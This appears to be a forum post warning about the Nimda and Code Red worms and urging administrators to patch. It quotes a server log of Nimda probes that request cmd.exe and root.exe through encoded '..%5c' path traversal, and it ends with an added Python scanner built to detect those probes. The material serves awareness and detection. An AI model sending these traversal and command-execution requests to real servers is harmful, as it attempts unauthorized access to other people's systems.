Unfortunately, Nimda doesn't restrict itself to IIS for infection. It can infect anyone on an unpatched Windows machine. It will:
- Infect you through email.
- Infect you through infected web pages you visit.
- Infect you via network shares.
- If there are no network shares, it will even try to make one.
If you are on Apache you are not completely safe, though the chance of being truly affected (vs. infected) is a bit low lately. The attacks are blind; the worm uses a dynamically created list of IPs to attack. If you are on the list, you will receive 14-16 hits, whether you are IIS or Apache or iPlanet or whatever. If you get hit in too short a span of time by too many infected machines (they don't have to be servers), DOS.
I recommend everyone visit www.cert.org if you haven't already done so to check out the entire story on Nimda, and any other problems that might be out there that could directly affect any of us.
Nimda and its cousin Code Red should ring warning bells in all our heads, whether we use Windows/IIS/PHP or Linux/Apache or whatever. These two worms did not attack new and unknown vulnerabilities in Windows. Code Red attacked a vulnerability that had been identified a full month prior in a special security bulletin, and a patch was available that took 3 minutes to download and 30 seconds to apply. Some of the attacks Nimda uses date back to vulnerabilities identified in 1998! Why then so successful? Administrators who are either too lax about their job or who don't know what they are doing unfortunately. And whether you hate Windows or not, if you admin a box running any OS, it is your job to make sure it is secure. MS is the big dog on the street so it is target numero uno, but Linux and the rest do have their vulnerabilities as well. Take a few moments to track them down and patch them rather than becoming a stat.
BTW, if interested, here is a Nimda attack (I get them all the time on my box on DSL; as long as they return a 404 I'm happy. I replaced the originating IP address; I am trying to contact the guy and I respect his privacy):
02:46:58 0.0.0.0 - 80 GET /scripts/root.exe /c+dir 404 3 3396 72 70 - -
02:46:59 0.0.0.0 - 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 - -
02:47:01 0.0.0.0 - 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 - -
02:47:02 0.0.0.0 - 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 - -
02:47:03 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -
02:47:05 0.0.0.0 - 80 GET /vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 117 10 - -
02:47:05 0.0.0.0 - 80 GET /mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 - -
02:47:05 0.0.0.0 - 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 - -
02:47:07 0.0.0.0 - 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:09 0.0.0.0 - 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:11 0.0.0.0 - 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:13 0.0.0.0 - 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:15 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 98 0 - -
02:47:15 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 0 - -
02:47:16 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 100 0 - -
02:47:18 0.0.0.0 - 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -
Jim
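Added example, not from Jim's post: a small scanner for IIS W3C logs in the layout quoted above that picks out the cmd.exe/root.exe probes, counts them per source, flags a burst of hits in a short window (the DOS concern raised above), and lists any probe that was not answered with a 404. The sample log lines and the IP addresses are constructed; the field positions follow the quoted log.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample in the IIS W3C layout of the log quoted above (these are
# not the lines from the post): time, client IP, '-', port, method, URI stem, query, status, ...
SAMPLE_LOG = """\
02:46:58 10.0.0.5 - 80 GET /scripts/root.exe /c+dir 404 3 3396 72 70 - -
02:46:59 10.0.0.5 - 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 - -
02:47:01 10.0.0.5 - 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 - -
02:47:03 10.0.0.5 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -
02:47:05 10.0.0.5 - 80 GET /vti_bin/..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 117 10 - -
02:47:18 10.0.0.5 - 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -
02:47:20 10.0.0.9 - 80 GET /index.html - 200 0 4210 55 0 - -
02:47:21 10.0.0.9 - 80 GET /images/logo.gif - 200 0 912 60 0 - -
"""
# The probes ask the server to run cmd.exe (or the root.exe copy Code Red II
# leaves behind) with "dir", usually via encoded "..\" or "../" traversal.
TARGET_RE = re.compile(r"/(?:root|cmd)\.exe$", re.IGNORECASE)
# Percent-encoded (and double-encoded) traversal forms; IIS may log some
# variants already decoded, so the target name above is the reliable signal.
TRAVERSAL_RE = re.compile(r"\.\.%(?:25)?(?:5c|2f|c[01]%(?:af|2f|1c|9c))", re.IGNORECASE)

def parse_line(line):
    """Return (time, ip, uri_stem, query, status) or None for short/comment lines."""
    f = line.split()
    if len(f) < 8 or f[0].startswith("#"):
        return None
    return f[0], f[1], f[5], f[6], f[7]

def classify(uri_stem, query):
    """'direct' or 'traversal' probe when the request targets cmd.exe/root.exe with /c+..."""
    if TARGET_RE.search(uri_stem) and query.lower().startswith("/c+"):
        return "traversal" if TRAVERSAL_RE.search(uri_stem) else "direct"
    return None

def scan_log(text, window_seconds=60, burst_threshold=5):
    """Collect probes, count them per source, and flag bursts and non-404 answers."""
    probes = [(r[0], r[1], classify(r[2], r[3]), r[4])
              for r in map(parse_line, text.splitlines()) if r and classify(r[2], r[3])]
    times = sorted(datetime.strptime(p[0], "%H:%M:%S") for p in probes)
    max_burst = max((sum(1 for u in times[i:] if (u - t).total_seconds() <= window_seconds)
                     for i, t in enumerate(times)), default=0)
    return {"probes": probes,
            "per_ip": dict(Counter(p[1] for p in probes)),
            "max_burst": max_burst,
            "burst_alert": max_burst >= burst_threshold,
            # "as long as they return a 404 I'm happy": anything else deserves a look.
            "not_404": [p for p in probes if p[3] != "404"]}
```

Run `scan_log(SAMPLE_LOG)` against a real log to get the per-source counts and the list of probes that got anything other than a 404 (a 500, as in one of the quoted lines, means the request reached some handler and is worth checking).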